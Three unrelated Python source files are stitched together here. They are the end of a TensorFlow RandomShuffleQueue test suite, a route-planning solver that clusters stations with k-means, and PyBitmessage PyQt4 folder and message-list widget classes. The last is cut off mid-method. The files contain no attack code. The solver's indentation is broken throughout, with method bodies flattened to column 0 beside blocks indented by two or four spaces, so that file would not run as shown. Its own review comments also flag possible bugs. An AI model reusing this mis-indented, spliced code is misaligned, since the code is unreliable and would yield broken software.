      q2 = tf.RandomShuffleQueue(10, 5, tf.int32,
                                 ((),), seed=87539319)
      enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
      enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
      deq1 = q1.dequeue_many(5)
      deq2 = q2.dequeue_many(5)
      enq1.run()
      enq1.run()
      enq2.run()
      enq2.run()
      results = [[], [], [], []]
      results[0].extend(deq1.eval())
      results[1].extend(deq2.eval())
      q1.close().run()
      q2.close().run()
      results[2].extend(deq1.eval())
      results[3].extend(deq2.eval())
      # No two should match
      for i in range(1, 4):
        for j in range(i):
          self.assertNotEqual(results[i], results[j])
  def testDequeueInDifferentOrders(self):
    """Different seeds produce different single-element dequeue orders."""
    with self.test_session():
      # Specify seeds to make the test deterministic
      # (https://en.wikipedia.org/wiki/Taxicab_number).
      q1 = tf.RandomShuffleQueue(10, 5, tf.int32,
                                 ((),), seed=1729)
      q2 = tf.RandomShuffleQueue(10, 5, tf.int32,
                                 ((),), seed=87539319)
      enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
      enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
      deq1 = q1.dequeue()
      deq2 = q2.dequeue()
      enq1.run()
      enq1.run()
      enq2.run()
      enq2.run()
      results = [[], [], [], []]
      for _ in range(5):
        results[0].append(deq1.eval())
        results[1].append(deq2.eval())
      q1.close().run()
      q2.close().run()
      for _ in range(5):
        results[2].append(deq1.eval())
        results[3].append(deq2.eval())
      # No two should match
      for i in range(1, 4):
        for j in range(i):
          self.assertNotEqual(results[i], results[j])
  def testBigEnqueueMany(self):
    """An enqueue_many larger than capacity completes incrementally."""
    with self.test_session() as sess:
      q = tf.RandomShuffleQueue(
          5, 0, tf.int32, ((),))
      elem = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
      enq = q.enqueue_many((elem,))
      deq = q.dequeue()
      size_op = q.size()
      enq_done = []
      def blocking_enqueue():
        enq_done.append(False)
        # This will fill the queue and then block until enough dequeues happen.
        sess.run(enq)
        enq_done.append(True)
      thread = self.checkedThread(target=blocking_enqueue)
      thread.start()
      # The enqueue should start and then block.
      results = []
      results.append(deq.eval())  # Will only complete after the enqueue starts.
      self.assertEqual(len(enq_done), 1)
      self.assertEqual(sess.run(size_op), 5)
      for _ in range(3):
        results.append(deq.eval())
      time.sleep(0.1)
      self.assertEqual(len(enq_done), 1)
      self.assertEqual(sess.run(size_op), 5)
      # This dequeue will unblock the thread.
      results.append(deq.eval())
      time.sleep(0.1)
      self.assertEqual(len(enq_done), 2)
      thread.join()
      for i in range(5):
        self.assertEqual(size_op.eval(), 5 - i)
        results.append(deq.eval())
        self.assertEqual(size_op.eval(), 5 - i - 1)
      self.assertItemsEqual(elem, results)
  def testBigDequeueMany(self):
    """A dequeue_many larger than capacity completes once enough is enqueued."""
    with self.test_session() as sess:
      q = tf.RandomShuffleQueue(2, 0, tf.int32, ((),))
      elem = range(4)
      enq_list = [q.enqueue((e,)) for e in elem]
      deq = q.dequeue_many(4)
      results = []
      def blocking_dequeue():
        # Will only complete after 4 enqueues complete.
        results.extend(sess.run(deq))
      thread = self.checkedThread(target=blocking_dequeue)
      thread.start()
      # The dequeue should start and then block.
      for enq in enq_list:
        # TODO(mrry): Figure out how to do this without sleeping.
        time.sleep(0.1)
        self.assertEqual(len(results), 0)
        sess.run(enq)
      # Enough enqueued to unblock the dequeue
      thread.join()
      self.assertItemsEqual(elem, results)
# Run the test suite when this file is executed directly.
if __name__ == "__main__":
  tf.test.main()
| |
import logging
import math
import random
import sys
import vector3
# Module-level logger for the solver.
log = logging.getLogger("solver")
# Largest station set solved exhaustively in a single basic pass.
max_single_solve_size = 12
# Allowed cluster sizes and how many stations map to one cluster.
cluster_size_max = 8
cluster_size_min = 1
cluster_divisor = 10
# Limits on cluster-size balancing and repeated clustered solves.
cluster_iteration_limit = 50
cluster_repeat_limit = 100
cluster_route_search_limit = 4
# Maximum number of clusters grouped into one supercluster.
supercluster_size_max = 8
# Solver mode identifiers accepted by Solver.solve.
CLUSTERED = "clustered"
CLUSTERED_REPEAT = "clustered-repeat"
BASIC = "basic"
NEAREST_NEIGHBOUR = "nearest-neighbour"
modes = [CLUSTERED, CLUSTERED_REPEAT, BASIC, NEAREST_NEIGHBOUR]
class _Cluster(object):
def __init__(self, objs, mean):
self.position = mean
self.systems = objs
@property
def is_supercluster(self):
return any(isinstance(s, _Cluster) for s in self.systems)
def get_closest(self, target):
best = None
bestdist = sys.float_info.max
for s in self.systems:
if isinstance(s, _Cluster) and s.is_supercluster:
newsys, newdist = s.get_closest(target)
if newdist < bestdist:
best = newsys
bestdist = newdist
else:
newdist = (s.position - target.position).length
if newdist < bestdist:
best = s
bestdist = newdist
return best, bestdist
def __repr__(self):
return "Cluster(size={}, pos={})".format(len(self.systems), self.position)
class Solver(object):
def __init__(self, calc, route, jump_range, diff_limit):
self._calc = calc
self._route = route
self._diff_limit = diff_limit
self._jump_range = jump_range
def solve(self, stations, start, end, maxstops, preferred_mode = CLUSTERED):
log.debug("Solving set using preferred mode '{}'".format(preferred_mode))
if preferred_mode == CLUSTERED_REPEAT and len(stations) > max_single_solve_size:
return self.solve_clustered_repeat(stations, start, end, maxstops), False
if preferred_mode == CLUSTERED and len(stations) > max_single_solve_size:
return self.solve_clustered(stations, start, end, maxstops), False
elif preferred_mode in [CLUSTERED, BASIC]:
return self.solve_basic(stations, start, end, maxstops), True
elif preferred_mode == NEAREST_NEIGHBOUR:
return self.solve_nearest_neighbour(stations, start, end, maxstops), True
else:
raise ValueError("invalid preferred_mode flag passed to solve")
def solve_basic(self, stations, start, end, maxstops):
result, _ = self.solve_basic_with_cost(stations, start, end, maxstops)
return result
  def solve_basic_with_cost(self, stations, start, end, maxstops):
    """Enumerate viable routes exhaustively and return the cheapest.

    Each candidate is also evaluated with its intermediate stops reversed
    and the cheaper orientation is kept.

    Returns:
      (route, cost): route includes start and end. NOTE(review): if no
      viable routes are found this returns (None, None).
    """
    # Degenerate case: no intermediate stations at all.
    if not any(stations):
      if start == end:
        return [start], 0.0
      else:
        return [start, end], self._calc.solve_cost(start, end, 0)
    log.debug("Calculating viable routes...")
    vr = self._get_viable_routes([start], stations, end, maxstops)
    log.debug("Viable routes: {0}".format(len(vr)))
    count = 0
    costs = []
    mincost = None
    minroute = None
    for route in vr:
      count += 1
      cost_normal = self._calc.solve_route_cost(route)
      # Keep the endpoints fixed and reverse only the middle of the route.
      route_reversed = [route[0]] + list(reversed(route[1:-1])) + [route[-1]]
      cost_reversed = self._calc.solve_route_cost(route_reversed)
      cost = cost_normal if (cost_normal <= cost_reversed) else cost_reversed
      route = route if (cost_normal <= cost_reversed) else route_reversed
      costs.append(cost)
      if mincost is None or cost < mincost:
        log.debug("New minimum cost: {0} on route {1}".format(cost, count))
        mincost = cost
        minroute = route
    return minroute, mincost
def solve_nearest_neighbour(self, stations, start, end, maxstops):
result, _ = self.solve_nearest_neighbour_with_cost(stations, start, end, maxstops)
return result
def solve_nearest_neighbour_with_cost(self, stations, start, end, maxstops):
route = [start]
full_cost = 0
remaining = stations
while any(remaining) and len(route)+1 < maxstops:
cur_cost = sys.maxsize
cur_stop = None
for s in remaining:
cost = self._calc.solve_cost(route[-1], s, len(route)-1)
if cost < cur_cost:
cur_stop = s
cur_cost = cost
if cur_stop is not None:
route.append(cur_stop)
remaining.remove(cur_stop)
full_cost += cur_cost
route.append(end)
return route, cur_cost
def solve_clustered(self, stations, start, end, maxstops):
result, _ = self.solve_clustered_with_cost(stations, start, end, maxstops)
return result
  def solve_clustered_with_cost(self, stations, start, end, maxstops):
    """Split the stations into clusters, order them, solve each in turn.

    Relies on the module-level find_centers (defined elsewhere in this file)
    for the k-means-style clustering step.

    Returns:
      (route, cost): full route including start and end, and the summed
      cost of the per-cluster basic solves.
    """
    cluster_count = int(math.ceil(float(len(stations) + 2) / cluster_divisor))
    log.debug("Splitting problem into {0} clusters...".format(cluster_count))
    clusters = find_centers(stations, cluster_count)
    clusters = self._resolve_cluster_sizes(clusters)
    sclusters = self._get_best_supercluster_route(clusters, start, end)
    route = [start]
    cost = 0
    # Stops still unassigned after the per-cluster budgets below.
    r_maxstops = maxstops - 2
    # Get the closest points in the first/last clusters to the start/end
    _, from_start = self._get_closest_points([start], sclusters[0].systems)
    to_end, _ = self._get_closest_points(sclusters[-1].systems, [end])
    # For each cluster...
    for i in range(0, len(sclusters)-1):
      log.debug("Solving for cluster at index {}...".format(i))
      from_cluster = sclusters[i]
      to_cluster = sclusters[i+1]
      # Get the closest points, disallowing using from_start or to_end
      from_end, to_start = self._get_closest_points(from_cluster.systems, to_cluster.systems, [from_start, to_end])
      # Work out how many of the stops we should be doing in this cluster
      cur_maxstops = min(len(from_cluster.systems), int(round(float(maxstops) * len(from_cluster.systems) / len(stations))))
      r_maxstops -= cur_maxstops
      # Solve and add to the route. DO NOT allow nested clustering, that makes it all go wrong :)
      newroute, newcost = self.solve_basic_with_cost([c for c in from_cluster.systems if c not in [from_start, from_end]], from_start, from_end, cur_maxstops)
      route += newroute
      cost += newcost
      from_start = to_start
    # Solve the final cluster with whatever stop budget remains.
    newroute, newcost = self.solve_basic_with_cost([c for c in sclusters[-1].systems if c not in [from_start, to_end]], from_start, to_end, r_maxstops)
    route += newroute
    cost += newcost
    route += [end]
    return route, cost
def solve_clustered_repeat(self, stations, start, end, maxstops, iterations = cluster_repeat_limit):
result, _ = self.solve_clustered_repeat_with_cost(stations, start, end, maxstops, iterations)
return result
def solve_clustered_repeat_with_cost(self, stations, start, end, maxstops, iterations = cluster_repeat_limit):
minroute = None
mincost = sys.float_info.max
for i in range(0, iterations):
route, cost = self.solve_clustered_with_cost(stations, start, end, maxstops)
if cost < mincost:
mincost = cost
minroute = route
return minroute, mincost
  def _resolve_cluster_sizes(self, pclusters):
    """Rebalance clusters until sizes and supercluster count are in limits.

    Oversized clusters are split in two; if there are too many clusters
    they are consolidated into superclusters. Gives up after
    cluster_iteration_limit passes. NOTE(review): the inner for-loop
    deletes from `clusters` while enumerating; the `break` immediately
    after the mutation keeps this safe.
    """
    clusters = list(pclusters)
    iterations = 0
    while iterations < cluster_iteration_limit:
      iterations += 1
      for i,c in enumerate(clusters):
        if c.is_supercluster:
          # Recursively balance the contents of nested superclusters.
          c.systems = self._resolve_cluster_sizes(c.systems)
        if len(c.systems) > cluster_size_max:
          log.debug("Splitting oversized cluster {} into two".format(c))
          del clusters[i]
          newclusters = find_centers(c.systems, 2)
          clusters += newclusters
          break
      lengths = [len(c.systems) for c in clusters]
      # If the current state is good, check supercluster size
      if min(lengths) >= cluster_size_min and max(lengths) <= cluster_size_max:
        if len(clusters) <= supercluster_size_max:
          break
        else:
          # Too many clusters, consolidate
          subdiv = int(math.ceil(float(len(clusters)) / supercluster_size_max))
          log.debug("Consolidating from {} to {} superclusters".format(len(clusters), subdiv))
          clusters = find_centers(clusters, subdiv)
          lengths = [len(c.systems) for c in clusters]
          # If everything is now valid...
          if min(lengths) >= cluster_size_min and max(lengths) <= cluster_size_max and len(clusters) <= supercluster_size_max:
            break
    log.debug("Using clusters of sizes {} after {} iterations".format(", ".join([str(len(c.systems)) for c in clusters]), iterations))
    return clusters
  def _get_route_legs(self, stations):
    """Plot a leg between every distinct pair of stations.

    Returns a dict-of-dicts where legs[a][b] is the route plotted from a to
    b; the same leg object is stored for both directions, so b->a reuses
    the a->b plot. A failed plot is logged and stored as None.
    """
    legs = {}
    for h in stations:
      legs[h] = {}
    for s in stations:
      for t in stations:
        # Skip self-pairs and pairs already plotted in the other direction.
        if s.to_string() != t.to_string() and t not in legs[s]:
          log.debug("Calculating leg: {0} -> {1}".format(s.name, t.name))
          leg = self._route.plot(s, t, self._jump_range)
          if leg is None:
            log.warning("Hop route could not be calculated: {0} -> {1}".format(s.name, t.name))
          legs[s][t] = leg
          legs[t][s] = leg
    return legs
def _get_viable_routes(self, route, stations, end, maxstops):
    """Recursively enumerate candidate routes worth costing in full.

    At each depth only the stations whose estimated next-hop cost is within
    a factor of self._diff_limit of the cheapest option are explored,
    pruning the search tree. Returns a list of complete routes, each
    terminated with *end*.
    """
    # If we have more non-end stops to go...
    if len(route) + 1 < maxstops:
        nexts = {}
        for stn in stations:
            # If this station already appears in the route, do more checks
            if stn in route or stn == end:
                # If stn is in the route at least the number of times it's in the original list, ignore it
                # Add 1 to the count if the start station is *also* the same, since this appears in route but not in stations
                route_matches = len([rs for rs in route if rs == stn])
                stn_matches = len([rs for rs in stations if rs == stn]) + (1 if stn == route[0] else 0)
                if route_matches >= stn_matches:
                    continue
            dist = self._calc.solve_cost(route[-1], stn, len(route)-1)
            nexts[stn] = dist
        # NOTE(review): if every station was filtered out above, nexts is
        # empty and min() raises ValueError — confirm callers prevent this.
        mindist = min(nexts.values())
        vsnext = []
        for stn, dist in nexts.items():
            if dist < (mindist * self._diff_limit):
                vsnext.append(stn)
        vrnext = []
        for stn in vsnext:
            vrnext = vrnext + self._get_viable_routes(route + [stn], stations, end, maxstops)
        return vrnext
    # We're at the end
    else:
        # NOTE: mutates the passed-in list before returning it.
        route.append(end)
        return [route]
def _get_best_supercluster_route(self, clusters, start, end):
    """Order superclusters into a route from *start* to *end*.

    Picks the cluster closest to the start and, from the remainder, the one
    closest to the end as endpoints; routes everything between them, then
    recursively expands nested superclusters into a flat list.
    """
    if len(clusters) == 1:
        return list(clusters)
    first = min(clusters, key=lambda t: t.get_closest(start)[1])
    last = min([c for c in clusters if c != first], key=lambda t: t.get_closest(end)[1])
    log.debug("Calculating supercluster route from {} --> {}".format(first, last))
    log.debug("Clusters: {}".format(clusters))
    if len(clusters) > 3:
        log.debug("Calculating cluster route for {}".format(clusters))
        inter, _ = self._get_best_cluster_route([c for c in clusters if c not in [first, last]], first, last)
    else:
        # With at most one intermediate cluster there is nothing to order.
        inter = [c for c in clusters if c not in [first, last]]
    proute = [first] + inter + [last]
    route = []
    for i,c in enumerate(proute):
        if isinstance(c, _Cluster) and c.is_supercluster:
            log.debug("Going deeper... i={}, c={}".format(i, c))
            # NOTE(review): route[i-1]/route[i+1] index the *partially built*
            # route, not proute — verify this neighbour lookup is intended.
            route += self._get_best_supercluster_route(c.systems, start if i == 0 else route[i-1], end if i >= len(route)-1 else route[i+1])
        else:
            route.append(c)
    return route
def _get_best_cluster_route(self, clusters, start, end, route = None):
    """Find the cheapest ordering of *clusters* between *start* and *end*.

    Greedy-limited depth-first search: at each depth only the
    cluster_route_search_limit clusters nearest to the route's current
    endpoint are tried. Once every cluster is placed, the candidate is
    costed by straight-line distances start -> clusters... -> end.

    Returns a (route, cost) tuple; route is None if nothing was found.
    """
    # Fixed: a None sentinel instead of a mutable `[]` default argument
    # (Python evaluates defaults once, so `[]` would be shared across calls).
    if route is None:
        route = []
    best = None
    bestcost = sys.float_info.max
    if not route:
        log.debug("In get_best_cluster_route, input = {}, start = {}, end = {}".format(clusters, start, end))
    if len(route) < len(clusters):
        # Extend the partial route from its current endpoint.
        startpt = route[-1].position if any(route) else start.position
        sclusters = sorted([c for c in clusters if c not in route], key=lambda t: (startpt - t.position).length)
        for i in range(0, min(len(sclusters), cluster_route_search_limit)):
            c_route, c_cost = self._get_best_cluster_route(clusters, start, end, route + [sclusters[i]])
            if c_cost < bestcost:
                best = c_route
                bestcost = c_cost
    else:
        # Route is complete: cost it end-to-end.
        cur_cost = (start.position - route[0].position).length
        for i in range(1, len(route)):
            cur_cost += (route[i-1].position - route[i].position).length
        cur_cost += (route[-1].position - end.position).length
        best = route
        bestcost = cur_cost
    return (best, bestcost)
def _get_closest_points(self, cluster1, cluster2, disallowed = ()):
    """Return the cheapest (node1, node2) pair linking two clusters.

    Nodes listed in *disallowed* are skipped, except when a cluster has a
    single member (then start == end, so the node must be allowed).
    Returns None if no pair could be evaluated.
    """
    # Fixed: immutable `()` default instead of a mutable `[]` default
    # argument; membership tests behave identically on a tuple.
    best = None
    bestcost = None
    for n1 in cluster1:
        if n1 in disallowed and len(cluster1) > 1:  # If len(cluster) is 1, start == end so allow it
            continue
        for n2 in cluster2:
            if n2 in disallowed and len(cluster2) > 1:  # If len(cluster) is 1, start == end so allow it
                continue
            cost = self._calc.solve_cost(n1, n2, 1)
            if best is None or cost < bestcost:
                best = (n1, n2)
                bestcost = cost
    return best
#
# K-means clustering
#
def _cluster_points(X, mu):
clusters = [[] for i in range(len(mu))]
for x in X:
bestmukey = min([(i[0], (x.position - mu[i[0]]).length) for i in enumerate(mu)], key=lambda t: t[1])[0]
clusters[bestmukey].append(x)
return clusters
def _reevaluate_centers(mu, clusters):
    """Return the new centre (mean member position) of every cluster.

    The previous centres *mu* are not used; the parameter exists only to
    keep the k-means call signature uniform.
    """
    return [vector3.mean([member.position for member in c]) for c in clusters]
def _has_converged(mu, oldmu):
return (set(mu) == set(oldmu))
def find_centers(X, K):
    """Standard k-means: partition the items of X into K clusters.

    Centres are initialised from randomly sampled item positions and the
    assign/recentre loop runs until the centres stop moving. Returns a
    list of _Cluster objects. Non-deterministic due to random seeding.
    """
    # Initialize to K random centers
    oldmu = random.sample([x.position for x in X], K)
    mu = random.sample([x.position for x in X], K)
    clusters = _cluster_points(X, mu)
    while not _has_converged(mu, oldmu):
        oldmu = mu
        # Assign all points in X to clusters
        clusters = _cluster_points(X, mu)
        # Reevaluate centers
        mu = _reevaluate_centers(oldmu, clusters)
    return [_Cluster(clusters[i], mu[i]) for i in range(len(mu))]
| |
"""
Folder tree and messagelist widgets definitions.
"""
# pylint: disable=too-many-arguments,bad-super-call
# pylint: disable=attribute-defined-outside-init
from cgi import escape
from PyQt4 import QtCore, QtGui
from bmconfigparser import BMConfigParser
from helper_sql import sqlExecute, sqlQuery
from settingsmixin import SettingsMixin
from tr import _translate
from utils import avatarize
# for pylupdate: mark the built-in folder names for translation so they are
# picked up into the .ts files (the return values are intentionally unused).
_translate("MainWindow", "inbox")
_translate("MainWindow", "new")
_translate("MainWindow", "sent")
_translate("MainWindow", "trash")

# Custom item-data role used to sort the time column numerically.
TimestampRole = QtCore.Qt.UserRole + 1
class AccountMixin(object):
    """UI-related functionality for accounts"""

    # Account type constants, assigned to self.type by setType().
    ALL = 0
    NORMAL = 1
    CHAN = 2
    MAILINGLIST = 3
    SUBSCRIPTION = 4
    BROADCAST = 5

    def accountColor(self):
        """QT UI color for an account"""
        if not self.isEnabled:
            # Disabled accounts are drawn grey.
            return QtGui.QColor(128, 128, 128)
        elif self.type == self.CHAN:
            # Chans are drawn orange.
            return QtGui.QColor(216, 119, 0)
        elif self.type in [self.MAILINGLIST, self.SUBSCRIPTION]:
            # Mailing lists and subscriptions are drawn purple.
            return QtGui.QColor(137, 4, 177)
        # Everything else uses the theme's default text colour.
        return QtGui.QApplication.palette().text().color()

    def folderColor(self):
        """QT UI color for a folder"""
        # Folders inherit the grey "disabled" look from their parent account.
        if not self.parent().isEnabled:
            return QtGui.QColor(128, 128, 128)
        return QtGui.QApplication.palette().text().color()

    def accountBrush(self):
        """Account brush (for QT UI)"""
        brush = QtGui.QBrush(self.accountColor())
        brush.setStyle(QtCore.Qt.NoBrush)
        return brush

    def folderBrush(self):
        """Folder brush (for QT UI)"""
        brush = QtGui.QBrush(self.folderColor())
        brush.setStyle(QtCore.Qt.NoBrush)
        return brush

    def accountString(self):
        """Account string suitable for use in To: field: label <address>"""
        label = self._getLabel()
        return (
            self.address if label == self.address
            else '%s <%s>' % (label, self.address)
        )

    def setAddress(self, address):
        """Set bitmessage address of the object"""
        if address is None:
            self.address = None
        else:
            # Coerce to str in case a QString/unicode slips through.
            self.address = str(address)

    def setUnreadCount(self, cnt):
        """Set number of unread messages"""
        try:
            # No change, no repaint.
            if self.unreadCount == int(cnt):
                return
        except AttributeError:
            # First assignment: self.unreadCount does not exist yet.
            pass
        self.unreadCount = int(cnt)
        if isinstance(self, QtGui.QTreeWidgetItem):
            self.emitDataChanged()

    def setEnabled(self, enabled):
        """Set account enabled (QT UI)"""
        self.isEnabled = enabled
        try:
            self.setExpanded(enabled)
        except AttributeError:
            # Not a tree item; nothing to expand.
            pass
        if isinstance(self, Ui_AddressWidget):
            # Propagate the state to the account's folder children.
            for i in range(self.childCount()):
                if isinstance(self.child(i), Ui_FolderWidget):
                    self.child(i).setEnabled(enabled)
        if isinstance(self, QtGui.QTreeWidgetItem):
            self.emitDataChanged()

    def setType(self):
        """Set account type (QT UI)"""
        self.setFlags(self.flags() | QtCore.Qt.ItemIsEditable)
        if self.address is None:
            # The "All accounts" pseudo-entry; its label is not editable.
            self.type = self.ALL
            self.setFlags(self.flags() & ~QtCore.Qt.ItemIsEditable)
        elif BMConfigParser().safeGetBoolean(self.address, 'chan'):
            self.type = self.CHAN
        elif BMConfigParser().safeGetBoolean(self.address, 'mailinglist'):
            self.type = self.MAILINGLIST
        elif sqlQuery(
                '''select label from subscriptions where address=?''', self.address):
            self.type = AccountMixin.SUBSCRIPTION
        else:
            self.type = self.NORMAL

    def defaultLabel(self):
        """Default label (in case no label is set manually)"""
        queryreturn = None
        retval = None
        if self.type in (
                AccountMixin.NORMAL,
                AccountMixin.CHAN, AccountMixin.MAILINGLIST):
            try:
                retval = unicode(
                    BMConfigParser().get(self.address, 'label'), 'utf-8')
            except Exception:
                # Not in keys.dat; fall back to the addressbook table.
                queryreturn = sqlQuery(
                    '''select label from addressbook where address=?''', self.address)
        elif self.type == AccountMixin.SUBSCRIPTION:
            queryreturn = sqlQuery(
                '''select label from subscriptions where address=?''', self.address)
        if queryreturn is not None:
            if queryreturn != []:
                for row in queryreturn:
                    retval, = row
                    retval = unicode(retval, 'utf-8')
        elif self.address is None or self.type == AccountMixin.ALL:
            return unicode(
                str(_translate("MainWindow", "All accounts")), 'utf-8')
        # Last resort: show the raw address.
        return retval or unicode(self.address, 'utf-8')
class BMTreeWidgetItem(QtGui.QTreeWidgetItem, AccountMixin):
    """A common abstract class for Tree widget item"""

    def __init__(self, parent, pos, address, unreadCount):
        # NOTE: calls object.__init__ via super(QtGui.QTreeWidgetItem, ...);
        # attaching to the parent widget is delegated to the subclass hook
        # _setup().
        super(QtGui.QTreeWidgetItem, self).__init__()
        self.setAddress(address)
        self.setUnreadCount(unreadCount)
        self._setup(parent, pos)

    def _getAddressBracket(self, unreadCount=False):
        # " (<n>)" unread-count suffix, or "" when not requested.
        return " (" + str(self.unreadCount) + ")" if unreadCount else ""

    def data(self, column, role):
        """Override internal QT method for returning object data"""
        if column == 0:
            if role == QtCore.Qt.DisplayRole:
                return self._getLabel() + self._getAddressBracket(
                    self.unreadCount > 0)
            elif role == QtCore.Qt.EditRole:
                return self._getLabel()
            elif role == QtCore.Qt.ToolTipRole:
                return self._getLabel() + self._getAddressBracket(False)
            elif role == QtCore.Qt.FontRole:
                # Bold font marks items with unread messages.
                font = QtGui.QFont()
                font.setBold(self.unreadCount > 0)
                return font
        return super(BMTreeWidgetItem, self).data(column, role)
class Ui_FolderWidget(BMTreeWidgetItem):
    """Item in the account/folder tree representing a folder"""

    # Fixed sort weights for the built-in folders; unknown folders get 99
    # and therefore sort after them.
    folderWeight = {"inbox": 1, "new": 2, "sent": 3, "trash": 4}

    def __init__(
            self, parent, pos=0, address="", folderName="", unreadCount=0):
        self.setFolderName(folderName)
        super(Ui_FolderWidget, self).__init__(
            parent, pos, address, unreadCount)

    def _setup(self, parent, pos):
        parent.insertChild(pos, self)

    def _getLabel(self):
        return _translate("MainWindow", self.folderName)

    def setFolderName(self, fname):
        """Set folder name (for QT UI)"""
        self.folderName = str(fname)

    def data(self, column, role):
        """Override internal QT method for returning object data"""
        if column == 0 and role == QtCore.Qt.ForegroundRole:
            return self.folderBrush()
        return super(Ui_FolderWidget, self).data(column, role)

    # inbox, sent, trash first, rest alphabetically
    def __lt__(self, other):
        if isinstance(other, Ui_FolderWidget):
            if self.folderName in self.folderWeight:
                x = self.folderWeight[self.folderName]
            else:
                x = 99
            if other.folderName in self.folderWeight:
                y = self.folderWeight[other.folderName]
            else:
                y = 99
            # Counteract Qt's reversal so weighted folders keep their fixed
            # order even when the column sort is descending.
            reverse = QtCore.Qt.DescendingOrder == \
                self.treeWidget().header().sortIndicatorOrder()
            if x == y:
                return self.folderName < other.folderName
            return x >= y if reverse else x < y
        return super(QtGui.QTreeWidgetItem, self).__lt__(other)
class Ui_AddressWidget(BMTreeWidgetItem, SettingsMixin):
    """Item in the account/folder tree representing an account"""

    def __init__(self, parent, pos=0, address=None, unreadCount=0, enabled=True):
        super(Ui_AddressWidget, self).__init__(
            parent, pos, address, unreadCount)
        self.setEnabled(enabled)

    def _setup(self, parent, pos):
        self.setType()
        parent.insertTopLevelItem(pos, self)

    def _getLabel(self):
        if self.address is None:
            # address None means the "All accounts" pseudo-entry.
            return unicode(_translate(
                "MainWindow", "All accounts").toUtf8(), 'utf-8', 'ignore')
        else:
            try:
                return unicode(
                    BMConfigParser().get(self.address, 'label'),
                    'utf-8', 'ignore')
            except:
                # No label configured; show the raw address.
                return unicode(self.address, 'utf-8')

    def _getAddressBracket(self, unreadCount=False):
        # When expanded, the per-folder counts are visible so the aggregate
        # unread count is omitted.
        ret = "" if self.isExpanded() \
            else super(Ui_AddressWidget, self)._getAddressBracket(unreadCount)
        if self.address is not None:
            ret += " (" + self.address + ")"
        return ret

    def data(self, column, role):
        """Override internal QT method for returning object data"""
        if column == 0:
            if role == QtCore.Qt.DecorationRole:
                return avatarize(
                    self.address or self._getLabel().encode('utf8'))
            elif role == QtCore.Qt.ForegroundRole:
                return self.accountBrush()
        return super(Ui_AddressWidget, self).data(column, role)

    def setData(self, column, role, value):
        """Save account label (if you edit in the UI, this will be triggered and will save it to keys.dat)"""
        if role == QtCore.Qt.EditRole \
                and self.type != AccountMixin.SUBSCRIPTION:
            BMConfigParser().set(
                str(self.address), 'label',
                str(value.toString().toUtf8())
                if isinstance(value, QtCore.QVariant)
                else value.encode('utf-8')
            )
            BMConfigParser().save()
        return super(Ui_AddressWidget, self).setData(column, role, value)

    def setAddress(self, address):
        """Set address to object (for QT UI)"""
        super(Ui_AddressWidget, self).setAddress(address)
        self.setData(0, QtCore.Qt.UserRole, self.address)

    def _getSortRank(self):
        # Disabled accounts sort after all enabled ones (+100 offset).
        return self.type if self.isEnabled else (self.type + 100)

    # label (or address) alphabetically, disabled at the end
    def __lt__(self, other):
        # pylint: disable=protected-access
        if isinstance(other, Ui_AddressWidget):
            reverse = QtCore.Qt.DescendingOrder == \
                self.treeWidget().header().sortIndicatorOrder()
            if self._getSortRank() == other._getSortRank():
                x = self._getLabel().lower()
                y = other._getLabel().lower()
                return x < y
            # Keep rank grouping stable regardless of sort direction.
            return (
                not reverse
                if self._getSortRank() < other._getSortRank() else reverse
            )
        return super(QtGui.QTreeWidgetItem, self).__lt__(other)
class Ui_SubscriptionWidget(Ui_AddressWidget):
    """Special treating of subscription addresses"""
    # pylint: disable=unused-argument

    def __init__(self, parent, pos=0, address="", unreadCount=0, label="", enabled=True):
        super(Ui_SubscriptionWidget, self).__init__(
            parent, pos, address, unreadCount, enabled)

    def _getLabel(self):
        # Subscription labels live in the database, not in keys.dat.
        queryreturn = sqlQuery(
            '''select label from subscriptions where address=?''', self.address)
        if queryreturn != []:
            for row in queryreturn:
                retval, = row
            return unicode(retval, 'utf-8', 'ignore')
        return unicode(self.address, 'utf-8')

    def setType(self):
        """Set account type"""
        super(Ui_SubscriptionWidget, self).setType()  # sets it editable
        self.type = AccountMixin.SUBSCRIPTION  # overrides type

    def setData(self, column, role, value):
        """Save subscription label to database"""
        if role == QtCore.Qt.EditRole:
            # Accept either a QVariant (from the view) or a plain string.
            if isinstance(value, QtCore.QVariant):
                label = str(
                    value.toString().toUtf8()).decode('utf-8', 'ignore')
            else:
                label = unicode(value, 'utf-8', 'ignore')
            sqlExecute(
                '''UPDATE subscriptions SET label=? WHERE address=?''',
                label, self.address)
        return super(Ui_SubscriptionWidget, self).setData(column, role, value)
class BMTableWidgetItem(QtGui.QTableWidgetItem, SettingsMixin):
    """A common abstract class for Table widget item"""

    def __init__(self, label=None, unread=False):
        super(QtGui.QTableWidgetItem, self).__init__()
        self.setLabel(label)
        self.setUnread(unread)
        self._setup()

    def _setup(self):
        # Items are selectable but not editable by default.
        self.setFlags(QtCore.Qt.ItemIsSelectable | QtCore.Qt.ItemIsEnabled)

    def setLabel(self, label):
        """Set object label"""
        self.label = label

    def setUnread(self, unread):
        """Set/unset read state of an item"""
        self.unread = unread

    def data(self, role):
        """Return object data (QT UI)"""
        if role in (
            QtCore.Qt.DisplayRole, QtCore.Qt.EditRole, QtCore.Qt.ToolTipRole
        ):
            return self.label
        elif role == QtCore.Qt.FontRole:
            # Unread rows are drawn bold.
            font = QtGui.QFont()
            font.setBold(self.unread)
            return font
        return super(BMTableWidgetItem, self).data(role)
class BMAddressWidget(BMTableWidgetItem, AccountMixin):
    """A common class for Table widget item with account"""

    def _setup(self):
        super(BMAddressWidget, self)._setup()
        self.setEnabled(True)
        self.setType()

    def _getLabel(self):
        return self.label

    def data(self, role):
        """Return object data (QT UI)"""
        if role == QtCore.Qt.ToolTipRole:
            return self.label + " (" + self.address + ")"
        elif role == QtCore.Qt.DecorationRole:
            # Avatar only when identicons are enabled in settings.
            if BMConfigParser().safeGetBoolean(
                    'bitmessagesettings', 'useidenticons'):
                return avatarize(self.address or self.label)
        elif role == QtCore.Qt.ForegroundRole:
            return self.accountBrush()
        return super(BMAddressWidget, self).data(role)
class MessageList_AddressWidget(BMAddressWidget):
    """Address item in a messagelist"""

    def __init__(self, address=None, label=None, unread=False):
        self.setAddress(address)
        super(MessageList_AddressWidget, self).__init__(label, unread)

    def setLabel(self, label=None):
        """Set label"""
        super(MessageList_AddressWidget, self).setLabel(label)
        if label is not None:
            return
